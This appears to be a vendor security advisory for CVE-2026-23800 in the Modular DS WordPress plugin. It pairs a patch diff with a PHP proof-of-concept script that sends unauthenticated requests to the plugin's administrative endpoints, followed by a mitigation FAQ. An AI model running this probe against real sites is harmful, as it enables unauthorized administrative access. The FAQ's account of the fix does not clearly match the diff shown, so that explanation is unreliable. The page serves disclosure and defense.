+    '67396cf9772d27504ccab5def06d1e52' => $vendorDir . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+    '49299b7cf704dda84b41286413c4d7e4' => $vendorDir . '/symfony/var-dumper/Resources/functions/dump.php',
+    '36a37457274e471b69dac0ebf51b90b3' => $vendorDir . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+    'e121a84a0c75bdd4c6e143812fa796a1' => $vendorDir . '/symfony/string/Resources/functions.php',
+    'f758949f401dc2a1f6a702b8afe6dfe4' => $vendorDir . '/symfony/polyfill-intl-idn/bootstrap.php',
+    '4b27ba2df9dd92700018e46af777f34f' => $vendorDir . '/symfony/polyfill-php81/bootstrap.php',
+    '5004fdd59b9e9307e6cd434a40d345f8' => $vendorDir . '/illuminate/events/functions.php',
+    '92149af1b8cbd5859e99da0ff318c72f' => $vendorDir . '/opis/closure/functions.php',
+    '929e580c79e3d98067c7165de1418f14' => $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php',
+    '2720919b2893441fad9f879d73593754' => $vendorDir . '/ramsey/uuid/src/functions.php',
+    'c0255d9fc9194fa59c7865314fa4fccd' => $vendorDir . '/ares/framework/src/helpers.php',
+    'abffc1041942c7350c813eb59081cf24' => $vendorDir . '/ares/framework/illuminate/Foundation/helpers.php',
+    '7cb02eee968935cda8344cc3dbfa9620' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php',
 );
--- a/modular-connector/vendor/composer/autoload_static.php
+++ b/modular-connector/vendor/composer/autoload_static.php
@@ -7,27 +7,27 @@
 class ComposerStaticInit20dc4b5b6916718faedab6064b350e72
 {
     public static $files = array (
-        '3be3930930d4833e9170bb96a98017ed' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
-        '57776b6b937d151aa09700e58bc43ff7' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
-        '47362306d406d3d5f750b39a76472c36' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
-        '5ae20ab1b22decfcdf1ec8cf5cb0c6df' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
-        '5b0ac2d5c681c57f19727b3f84f240f6' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
-        '6ecf50c74684d51e775de2f58a75568d' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
-        'd7477911cd049bbd22fc06886adcd76a' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
-        'da3333cb928bd72afb37c8655e4b0dc4' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
-        'be46ff9416c6039edf2c9e9d0f073bc7' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
-        'cd924b8b8867bdf5cb30ea3d1fda7877' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
-        '96e6be4dee482c433db35007e272ccb1' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
-        'e6d623430cf9dfede21ce0afb13fc0d5' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
-        '6595570c01f6b61275f965dd5f61dc9e' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
-        '5b10ea17a66c57c2dec9163991a14bfe' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
-        'e9263394afb0f5bb487acaa8ed5a379c' => __DIR__ . '/..' . '/illuminate/events/functions.php',
-        '2159037f38ede778c62d6f26243fd889' => __DIR__ . '/..' . '/opis/closure/functions.php',
-        '96012c69e36abd148dd6e21fe7da2fca' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
-        'dcf98500ad62a9796e6d807dd200c4ad' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
-        'f0a9f602b56a7514b8a4ae31dad26396' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
-        '5d00439f4bfea78f75490a2b73529178' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
-        '39aca1ab5f5b45f7014527f1ffae03c8' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
+        'be0e863a0b7d410051e3679684b89d05' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
+        'cdccba37285717201be0cda22130b7c1' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
+        '4da8a5f965edcd26473fcbf2be82d7d7' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
+        '5d7599fb41d4880e3bb858d832901e9a' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
+        '91ee1bbb29b3989967f6f8639a6d635d' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
+        'b72b50162266450392ddd5c515a75818' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
+        '9f49441cfe0691e56c9c67bd097c4350' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
+        '2754c0fa2f40527b67501543ab0dae51' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
+        '67396cf9772d27504ccab5def06d1e52' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+        '49299b7cf704dda84b41286413c4d7e4' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
+        '36a37457274e471b69dac0ebf51b90b3' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+        'e121a84a0c75bdd4c6e143812fa796a1' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
+        'f758949f401dc2a1f6a702b8afe6dfe4' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
+        '4b27ba2df9dd92700018e46af777f34f' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
+        '5004fdd59b9e9307e6cd434a40d345f8' => __DIR__ . '/..' . '/illuminate/events/functions.php',
+        '92149af1b8cbd5859e99da0ff318c72f' => __DIR__ . '/..' . '/opis/closure/functions.php',
+        '929e580c79e3d98067c7165de1418f14' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
+        '2720919b2893441fad9f879d73593754' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
+        'c0255d9fc9194fa59c7865314fa4fccd' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
+        'abffc1041942c7350c813eb59081cf24' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
+        '7cb02eee968935cda8344cc3dbfa9620' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
     );

     public static $prefixLengthsPsr4 = array (
@@ -2671,7 +2671,6 @@
         'Modular\Connector\Http\Controllers\ServerController' => __DIR__ . '/../..' . '/src/app/Http/Controllers/ServerController.php',
         'Modular\Connector\Http\Controllers\WooCommerceController' => __DIR__ . '/../..' . '/src/app/Http/Controllers/WooCommerceController.php',
         'Modular\Connector\Http\Kernel' => __DIR__ . '/../..' . '/src/app/Http/Kernel.php',
-        'Modular\Connector\Http\Middleware\Authenticate' => __DIR__ . '/../..' . '/src/app/Http/Middleware/Authenticate.php',
         'Modular\Connector\Http\Middleware\AuthenticateLoopback' => __DIR__ . '/../..' . '/src/app/Http/Middleware/AuthenticateLoopback.php',
         'Modular\Connector\Jobs\ConfigureDriversJob' => __DIR__ . '/../..' . '/src/app/Jobs/ConfigureDriversJob.php',
         'Modular\Connector\Jobs\Health\ManagerHealthDataJob' => __DIR__ . '/../..' . '/src/app/Jobs/Health/ManagerHealthDataJob.php',
--- a/modular-connector/vendor/composer/installed.php
+++ b/modular-connector/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'modular/connector',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '31b71716c4e10fe87dce8f18e026c33edf345468',
+        'reference' => 'ff508e7a68350177872cefc7c0cf72cab74fe5a1',
         'type' => 'wordpres-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'ares/framework' => array(
-            'pretty_version' => '3.6.8',
-            'version' => '3.6.8.0',
-            'reference' => '94e71ee8ba4b29ab41bc03485533a08bf7b82e21',
+            'pretty_version' => '3.6.17',
+            'version' => '3.6.17.0',
+            'reference' => 'a912d44484836fec6ba90420f2bf2efa67084ec6',
             'type' => 'library',
             'install_path' => __DIR__ . '/../ares/framework',
             'aliases' => array(),
@@ -301,7 +301,7 @@
         'modular/connector' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '31b71716c4e10fe87dce8f18e026c33edf345468',
+            'reference' => 'ff508e7a68350177872cefc7c0cf72cab74fe5a1',
             'type' => 'wordpres-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/modular-connector/vendor/scoper-autoload.php
+++ b/modular-connector/vendor/scoper-autoload.php
@@ -14,7 +14,7 @@
     // Restore the backup and ensure the excluded files are properly marked as loaded
     $GLOBALS['__composer_autoload_files'] = array_merge(
         $existingComposerAutoloadFiles,
-        array_fill_keys(['d7477911cd049bbd22fc06886adcd76a', '9eaa6b0f3f04e58e17ae5ecb754ea313', '96e6be4dee482c433db35007e272ccb1', 'acbe0d033c55cd0a032b415e08d14f4c', '6595570c01f6b61275f965dd5f61dc9e', 'b48cbeb76a71e226a23fa64ac2b94dc6', 'be46ff9416c6039edf2c9e9d0f073bc7', '36dfd6ed9dd74e8062aa61f09caf8554', '57776b6b937d151aa09700e58bc43ff7', '5928a00fa978807cf85d90ec3f4b0147', 'da3333cb928bd72afb37c8655e4b0dc4', '3be3930930d4833e9170bb96a98017ed', '5b10ea17a66c57c2dec9163991a14bfe', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
+        array_fill_keys(['9f49441cfe0691e56c9c67bd097c4350', '9eaa6b0f3f04e58e17ae5ecb754ea313', '36a37457274e471b69dac0ebf51b90b3', 'acbe0d033c55cd0a032b415e08d14f4c', 'f758949f401dc2a1f6a702b8afe6dfe4', 'b48cbeb76a71e226a23fa64ac2b94dc6', '67396cf9772d27504ccab5def06d1e52', '36dfd6ed9dd74e8062aa61f09caf8554', 'cdccba37285717201be0cda22130b7c1', '5928a00fa978807cf85d90ec3f4b0147', '2754c0fa2f40527b67501543ab0dae51', 'be0e863a0b7d410051e3679684b89d05', '4b27ba2df9dd92700018e46af777f34f', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
     );

     return $loader;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23800 - Modular DS 2.5.2 - Unauthenticated Privilege Escalation

<?php

$target_url = "http://vulnerable-wordpress-site.com"; // CHANGE THIS

// Vulnerable endpoint patterns
$endpoints = [
    '/wp-admin/admin-ajax.php?action=modular-connector&type=request&origin=mo&mrid=1',
    '/wp-admin/admin-ajax.php?action=modular-connector&type=request&origin=mo&mrid=2'
];

foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    
    echo "[+] Testing endpoint: $urln";
    
    // Initialize cURL session
    $ch = curl_init();
    
    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic legitimate request
    $headers = [
        'User-Agent: ModularConnector/1.0 (Linux)',
        'Accept: application/json',
        'Content-Type: application/json'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    // Execute request
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    // Check response
    if ($http_code == 200) {
        echo "[!] SUCCESS: Endpoint accessible without authenticationn";
        echo "[!] Response: " . substr($response, 0, 500) . "nn";
        
        // Try to identify which endpoint we hit
        $json_response = json_decode($response, true);
        if ($json_response) {
            if (isset($json_response['information'])) {
                echo "[!] DETECTED: Server information endpoint (privileged data)n";
            }
            if (isset($json_response['tree'])) {
                echo "[!] DETECTED: Database tree endpoint (sensitive structure)n";
            }
        }
    } else {
        echo "[-] Failed with HTTP code: $http_coden";
    }
    
    curl_close($ch);
    echo "n";
}

// Test specific administrative actions
$admin_actions = [
    'server-information' => 'Retrieves server configuration and sensitive data',
    'cache/clear' => 'Clears site cache (administrative action)',
    'tree/database' => 'Accesses database structure (privileged information)'
];

echo "[+] Testing specific administrative endpoints:nn";

foreach ($admin_actions as $action => $description) {
    $test_url = $target_url . "/wp-admin/admin-ajax.php?action=modular-connector&type=request&origin=mo&mrid=100&path=/api/modular-connector/" . $action;
    
    echo "[*] Testing: $actionn";
    echo "[*] Description: $descriptionn";
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $test_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => [
            'User-Agent: ModularConnector/1.0 (Linux)',
            'Accept: application/json'
        ]
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if ($http_code == 200) {
        echo "[!] VULNERABLE: Unauthenticated access to $action confirmedn";
        echo "[!] This indicates successful privilege escalationn";
    } else {
        echo "[-] Protected or not vulnerable (HTTP $http_code)n";
    }
    
    curl_close($ch);
    echo "n";
}

echo "[+] Proof of Concept complete. If any endpoints returned 200 responses,n";
echo "[+] the site is vulnerable to CVE-2026-23800 privilege escalation.n";

?>

Frequently Asked Questions

What is CVE-2026-23800?
Understanding the vulnerability
CVE-2026-23800 is a critical vulnerability in the Modular DS plugin for WordPress, specifically in version 2.5.2. It allows unauthenticated attackers to escalate their privileges to that of an administrator by exploiting an authentication bypass in the plugin’s API routing system.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from the removal of authentication middleware, which allowed unauthenticated users to access administrative API endpoints. Attackers could send direct requests to these endpoints without needing any authentication tokens, enabling them to perform privileged actions.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Modular DS plugin version 2.5.2 is at risk. Administrators should verify their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard and look for the Modular DS plugin. If the version displayed is 2.5.2, your site is affected by this vulnerability.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.6.0 of the Modular DS plugin. Updating to this version will restore proper authentication checks and mitigate the risk associated with CVE-2026-23800.
What should I do if I cannot update the plugin immediately?
Mitigation steps
If immediate updating is not possible, consider disabling the Modular DS plugin until a safe update can be performed. Additionally, monitor your site for any suspicious activity and review access logs for unauthorized access.
What does the CVSS score of 9.8 mean?
Understanding severity ratings
A CVSS score of 9.8 indicates a critical vulnerability, suggesting that exploitation could lead to severe consequences, including complete administrative access to the site. This level of risk necessitates immediate attention and remediation.
What impact does successful exploitation have?
Consequences of the vulnerability
Exploitation of this vulnerability allows attackers to perform any administrative action on the WordPress site, including accessing sensitive information, modifying site settings, and potentially compromising the entire site.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an attacker can send crafted requests to vulnerable API endpoints without authentication. This illustrates the ease with which an unauthenticated user can exploit the vulnerability to gain administrative access.
What are the specific routes affected by this vulnerability?
Identifying vulnerable endpoints
The affected routes include ‘/server-information’, ‘/white-label’, ‘/cache/clear’, ‘/tree/database’, and ‘/backup/information’. These routes were previously protected but became accessible due to the removal of authentication checks.
Is there a risk of data exfiltration?
Potential data breaches
Yes, successful exploitation can lead to data exfiltration, as attackers can access sensitive server information and database structures. This poses a significant risk to the integrity and confidentiality of the site.
What should I do after updating the plugin?
Post-update best practices
After updating to the patched version, review your site’s security settings, change any compromised credentials, and monitor for any unusual activity. Regularly check for updates and security advisories related to your plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations